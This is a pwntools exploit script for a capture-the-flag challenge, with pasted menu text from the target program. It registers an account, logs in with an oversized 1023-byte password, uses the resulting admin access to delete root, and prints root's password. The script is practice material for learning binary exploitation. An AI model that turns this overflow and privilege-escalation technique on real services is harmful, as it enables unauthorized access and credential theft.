#create user&password -> login -> validate psn session -> delete root -> show root passwd
from pwn import *
# Open one TCP connection to the CTF challenge service. Everything below is a
# scripted menu dialogue over this connection, so the order of sends and
# receives must match the order in which the service prints its prompts.
p = remote("pwn.challenge.ctf.show",28156)
#-----main -> menu
#-----from main
#-----create_new_user
# Step 1 - main-menu option 1: register a throwaway account.
p.sendline('1')
p.recvuntil('username :')
p.sendline('pwn')  # any name works; it is reused at login and under "manage users"
#p.sendlineafter('username :','pwn')
p.recvuntil('password :')
p.sendline('A'*0x18)  # author's note: the limit is 0x18, so this fills it exactly
#p.sendlineafter('password :','a'*0x18)#change_passwd
#-----login
# Step 2 - main-menu option 2: log in as the account created above.
# The login prompts are capitalised ('Username :' / 'Password :'), unlike the
# creation prompts, so the recvuntil markers differ in case.
p.sendline('2')
p.recvuntil('Username :')
p.sendline('pwn')  # the name chosen in step 1
#p.sendlineafter('Username : ','pwn')
p.recvuntil('Password :')
# NOTE(review): 1023 bytes are sent here although the account was created with
# a 0x18-byte password; the author did not record why this is accepted.
# TODO: document the root cause (presumably a missing or mismatched length
# check in the login path - confirm against the binary).
p.sendline('A'*1023)#I don't know why
# Author's note: sendlineafter cannot be used here.
# NOTE(review): the commented-out call below waits for 'Password : ' with a
# trailing space and passes the literal text "'a'*1023" rather than 1023
# characters; either difference may be why it did not work - unverified.
#p.sendlineafter('Password : ',"'a'*1023")
#-----to menu
#-----manage users
# Step 3 - option 3 of the post-login menu ("manage users"), applied to the
# account 'pwn', then sub-option 3 at the '>' prompt.
# NOTE(review): reaching "manage users" and "delete account" for another user
# from a freshly created account suggests the session is treated as
# privileged after step 2 - confirm which role check the service performs.
p.sendline('3')
#p.recvuntil('modify :')
#p.sendline('pwn')
p.sendlineafter('modify :','pwn')
#p.recvuntil('>')
#p.sendline('3')
p.sendlineafter('>','3')#i=-1 -> print('>') -> end change_user_admin
#-----delete account
# Step 4 - option 4 ("delete account"): name 'root' as the account to delete.
p.sendline('4')
#p.recvuntil('delete :')
#p.sendline('root')
p.sendlineafter('delete :','root')
#-----show my data
# Step 5 - option 3 ("show my data"): skip everything up to the
# "Password : " label and print what the service sends after it.
p.sendline('3')
p.recvuntil("Password : ")
# recv() returns only the data available at that moment, so the printed value
# may be incomplete or include trailing menu text.
print(p.recv())
# The connection is left open; close() is commented out.
#p.close()
\n\nPlease choose an option between the following : \n
1 : create an user\n
2 : login\n
0 : exit\n>
由此可知，需要先创建一个 user，然后再登录，也就是说先让 v3 == 1，再让 v3 == 2。
Actions :\n
1 : create new user\n
2 : list users\n
3 : manage users\n
4 : delete account\n
0 : Logout\n>
"Actions :\n"
" 1 : show messages\n"
" 2 : add message\n"
" 3 : show my data\n"
" 4 : change password\n"
" 5 : delete account\n"
" 0 : Logout\n"
"> "
"Your account is not activated.\n"
"Please contact an admin to activate it\n"
"Actions :\n"
" 1 : change password\n"
" 2 : delete account\n"
" 0 : Logout\n"
"> "